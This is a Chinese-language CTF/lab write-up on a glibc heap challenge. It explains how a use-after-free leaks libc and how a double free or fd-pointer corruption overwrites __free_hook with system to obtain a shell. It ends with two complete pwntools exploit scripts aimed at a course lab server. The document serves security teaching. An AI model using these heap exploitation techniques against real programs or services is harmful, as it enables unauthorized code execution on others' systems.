Simple PWN - 0x39(Lab - Double Free)
Run On Ubuntu 20.04
Background
Source code
1 | |
Recon
這一題有很多種方式可以拿到shell,不過原理都是一樣的,前置作業都是一樣的,也就是要利用UAF去leak出libc address,接著算出__free_hook以及system的位址,接著想辦法把system寫到__free_hook的位址,此時就有兩種方式可以寫,一種是利用此次學到的double free,把值寫到最後一個在tcache的free chunk,蓋掉他的fd,接著就可以用add_note把tcache的值要回來,並寫system的address進到__free_hook;另一種方式就比較簡單,也就是把free chunk的fd利用UAF的特性改掉,並且直接add_note把東西從tcache要回來,之後就一樣寫system_addr,後free掉一個帶有/bin/sh的chunk,此時就會開一個shell給我們了
前置作業: Leak Libc Address
關於這一點可以參考如何用UAF leak libc address?,方法都一樣,首先要想辦法讓free chunk進到unsorted bin中(最簡單的方法就是設定超過0x410的空間),接著因為malloc的時候沒有實作清空原本的資料,導致我們可以leak其中有關libc section的資訊。底下的設定意思是我們先設定三個notes,#14的意思是不要讓#13被free掉的時候被consolidate用的,接著我們把前兩個free掉,結果如下
會發現#12和#13被consolidate在一起了,接著我們看其中的一些資訊
裡面確實存著libc相關的資訊,接著只要把這一塊chunk malloc出去給隨便一個note,接著讀其中的資料就可以讀出libc address了
1 | |
方法一: Double Fee
有了libc address後,我們要想辦法把system address寫到__free_hook的位置,如果是要用double free的方法的話可以參考上課的講義:

最簡單的方法是,我把tcache填滿(一定要),然後用free(a)→free(b)→free(a)的順序產生double free
1 | |
此時的heapinfo會變成:

接著我們把tcache清空後再繼續add_note就會把fastbin的free chunk搬到tcache中
1 | |

接著我們寫free_hook address到note #8,這樣的話,tcache的順序就會變成下圖:
1 | |

此時我們就把free chunk變成free_hook的地址,我們只不斷的add_note,就可以把tcache的free chunk要回來進行寫入,也就是寫system address:
1 | |

最後的結果如上圖,會發現note #11已經變成==0x7f900aa8ae48==,這個就是__free_hook的位址,進去看發現已經被我們寫入system address,這個時候我們只要把含有/bin/sh\x00的note #9 free掉,就可以開shell了
方法二: 一般的寫入
這一個方法比較方便,也和double free沒關係,反正我們只要利用UAF的特性,也可以把free chunk的fd改掉,再用像前面的方法就可以開shell
下面的建構就是先開兩個note,然後free掉,此時我們就可以利用UAF的漏洞把free chunk的fd改掉,結果如下圖

1 | |
接著就把/bin/sh\x00寫到note #2,接著就不斷add_note,把__free_hook的address拿到手,然後再把system address寫到__free_hook,最後把含有/bin/sh\x00的note #2 free掉,結果如下圖:
從上圖得知,note #4的address已經被我們換成__free_hook address,並且實際跟進去就是system address,最後只要free掉note #2就可以開shell了
Exploit - Leak Libc(UAF) + Double Free(?)
- Method 1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80from pwn import * r = process('./chal') r = remote('10.113.184.121', 10058) libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') context.arch = 'amd64' def add_note(idx, len): r.recvuntil(b'choice: ') r.send(b'1') r.recvuntil(b'Index: ') r.send(str(idx).encode()) r.recvuntil(b'Length: ') r.send(str(len).encode()) def read_note(idx): r.recvuntil(b'choice: ') r.send(b'2') r.recvuntil(b'Index: ') r.send(str(idx).encode()) r.recvline() def write_note(idx, content): r.recvuntil(b'choice: ') r.send(b'3') r.recvuntil(b'Index: ') r.send(str(idx).encode()) r.recvuntil(b'Content: ') r.send(content) def del_note(idx): r.recvuntil(b'choice: ') r.send(b'4') r.recvuntil(b'Index: ') r.send(str(idx).encode()) # Leak libc address add_note(12, 0x420) add_note(13, 0x420) add_note(14, 0x420) del_note(12) del_note(13) add_note(12, 0x420) read_note(12) leak_libc = u64(r.recv(8)) libc_base = leak_libc - 0x1ed0e0 system_addr = libc_base + libc.symbols['system'] free_hook = libc_base + 0x1eee48 log.success(f'Leak Libc = {hex(leak_libc)}') log.success(f'Libc Base = {hex(libc_base)}') log.success(f'System Address = {hex(system_addr)}') log.success(f'Free Hook = {hex(free_hook)}') r.recv(0x420 - 0x8) ## Use Double Free to Write system_addr to __free_hook for i in range(1, 0xa): add_note(i, 0x10) for i in range(1, 0x8): del_note(i) del_note(8) del_note(9) del_note(8) ### Clean tcache for i in range(1, 0x8): add_note(i, 0x10) add_note(8, 0x18) write_note(8, p64(free_hook)) bin_sh = u64(b'/bin/sh\x00') add_note(9, 0x10) write_note(9, p64(bin_sh)) add_note(10, 0x10) add_note(11, 0x10) write_note(11, p64(system_addr)) del_note(9) r.interactive() - Method 2
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70from pwn import * r = process('./chal') r = remote('10.113.184.121', 10058) libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') context.arch = 'amd64' def add_note(idx, len): r.recvuntil(b'choice: ') r.send(b'1') r.recvuntil(b'Index: ') r.send(str(idx).encode()) r.recvuntil(b'Length: ') r.send(str(len).encode()) def read_note(idx): r.recvuntil(b'choice: ') r.send(b'2') r.recvuntil(b'Index: ') r.send(str(idx).encode()) r.recvline() def write_note(idx, content): r.recvuntil(b'choice: ') r.send(b'3') r.recvuntil(b'Index: ') r.send(str(idx).encode()) r.recvuntil(b'Content: ') r.send(content) def del_note(idx): r.recvuntil(b'choice: ') r.send(b'4') r.recvuntil(b'Index: ') r.send(str(idx).encode()) # Leak libc address add_note(12, 0x420) add_note(13, 0x420) add_note(14, 0x420) del_note(12) del_note(13) add_note(12, 0x420) read_note(12) leak_libc = u64(r.recv(8)) libc_base = leak_libc - 0x1ed0e0 system_addr = libc_base + libc.symbols['system'] free_hook = libc_base + 0x1eee48 log.success(f'Leak Libc = {hex(leak_libc)}') log.success(f'Libc Base = {hex(libc_base)}') log.success(f'System Address = {hex(system_addr)}') log.success(f'Free Hook = {hex(free_hook)}') r.recv(0x420 - 0x8) ## Another Way to Write system_addr to __free_hook add_note(1, 0x18) add_note(2, 0x18) del_note(2) del_note(1) write_note(1, p64(free_hook) + p64(0) * 2) bin_sh = u64(b'/bin/sh\x00') write_note(2, p64(bin_sh)) add_note(3, 0x18) add_note(4, 0x18) write_note(4, p64(system_addr)) raw_input() del_note(2) r.interactive()